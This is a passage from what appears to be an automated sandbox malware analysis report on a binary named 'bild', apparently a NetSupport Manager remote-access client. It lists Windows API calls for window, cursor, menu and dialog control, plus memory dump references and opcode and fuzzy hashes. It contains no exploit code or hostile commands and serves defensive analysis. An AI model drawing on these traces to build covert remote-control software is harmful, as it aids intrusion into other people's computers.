                                                                                          • SetForegroundWindow.USER32(?), ref: 1115F12E
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • SystemParametersInfoA.USER32(00002000,00000000,00000000,00000000), ref: 1115F14F
                                                                                          • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                          • SetForegroundWindow.USER32(?), ref: 1115F162
                                                                                          • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F177
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                          • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                          • API String ID: 3960414890-2201682149
                                                                                          • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                          • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                          • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                          • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                          APIs
                                                                                          • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                          • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                          • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                          • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                          • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                          • API String ID: 468487828-934300333
                                                                                          • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                          • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                          • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                          • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                          • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                          • GetCursorPos.USER32(?), ref: 111192A1
                                                                                          • GetTickCount.KERNEL32 ref: 111192B6
                                                                                          • GetTickCount.KERNEL32 ref: 11119337
                                                                                          • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                          • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                          • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                          • String ID:
                                                                                          • API String ID: 4245181967-0
                                                                                          • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                          • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                          • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                          • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                          APIs
                                                                                          • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                          • _strncat.LIBCMT ref: 1102518B
                                                                                          • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                          • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                          • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                          • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                          • SetFocus.USER32(?), ref: 11025265
                                                                                            • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3832070631-0
                                                                                          • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                          • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                          • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                          • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                          APIs
                                                                                            • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,F3EE1E80,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                            • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                            • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                            • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                            • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                            • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,F3EE1E80,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                          • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                          • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                          • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                          • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                          • API String ID: 3780373956-3165951319
                                                                                          • Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                          • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                          • Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                          • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                          APIs
                                                                                            • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                            • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                            • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                            • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                            • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                          • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                          • API String ID: 3136964118-2830328467
                                                                                          • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                          • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                          • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                          • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 111370A6
                                                                                          • _free.LIBCMT ref: 111370DD
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • _free.LIBCMT ref: 1113716D
                                                                                            • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                          • _free.LIBCMT ref: 1113713E
                                                                                            • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                            • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                          • String ID: *HelpReqServer$Client
                                                                                          • API String ID: 1390041139-3616015116
                                                                                          • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                          • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                          • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                          • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                          APIs
                                                                                          • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                            • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                          • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                          • MessageBeep.USER32(00000000), ref: 11143427
                                                                                          • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                          • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                          • String ID: 1000,50
                                                                                          • API String ID: 3904670044-1941404556
                                                                                          • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                          • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                          • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                          • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32(75A77AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                          • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                            • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                          • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                          • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                          • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                          • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                          • String ID:
                                                                                          • API String ID: 3235510773-0
                                                                                          • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                          • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                          • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                          • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                          APIs
